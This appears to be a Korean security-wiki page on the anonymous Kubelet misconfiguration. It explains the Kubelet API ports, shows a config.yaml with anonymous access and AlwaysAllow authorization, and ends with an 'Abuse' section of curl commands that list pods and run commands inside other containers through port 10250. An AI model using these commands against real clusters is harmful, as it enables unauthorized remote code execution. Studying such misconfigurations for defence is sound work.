Anonymous Kubelet

Kubelet은 API 서버와 통신하며 Pod들을 관리하는 각 노드의 에이전트입니다.

컴포넌트

포트

위치

역할

API Server

6443

Control Plane

클러스터 전체 관리 API

Kubelet

10250 / 10255

각 Worker node

노드/Pod 관리 API

API 서버와 Kubelet은 REST API를 사용하여 통신하며, Kubelet의 10255(HTTP)는 Read-only, 10250(HTTPS)는 모든 기능을 요청할 수 있는 API 엔드 포인트입니다.

과거 쿠버네티스 노드의 /var/lib/kubelet/config.yaml 파일에는 Kubelet의 엔드포인트에 익명 사용자도 접근을 허용하는 속성이 기본 값으로 설정되어 있었습니다.

현재도 kubelet을 수동으로 구성했다면 기본으로 익명 접근을 허용하지만, kubeadm이나 벤더사에서 제공하는 쿠버네티스 서비스(AKS, EKS 등)는 보안 설정이 되어있습니다.

apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
  anonymous:
    enabled: true # Anonymous 허용
  webhook:
    cacheTTL: 0s
    enabled: true
  x509:
    clientCAFile: /etc/kubernetes/pki/ca.crt
authorization:
  mode: AlwaysAllow # 모든 요청 인가 허용

Abuse

# pod 목록 조회
curl -sk https://'<node-ip>':10250/pods | jq '.items[].metadata | {namespace, name}'

# 다른 pod에 RCE
curl -k https://'<node-ip>':10250/run/<namespace>/<pod>/<container> -d "cmd=hostname"

PreviousautomountServiceAccountToken Nextetcd non-authentication

Last updated 2 days ago

hashtagAbuse

Abuse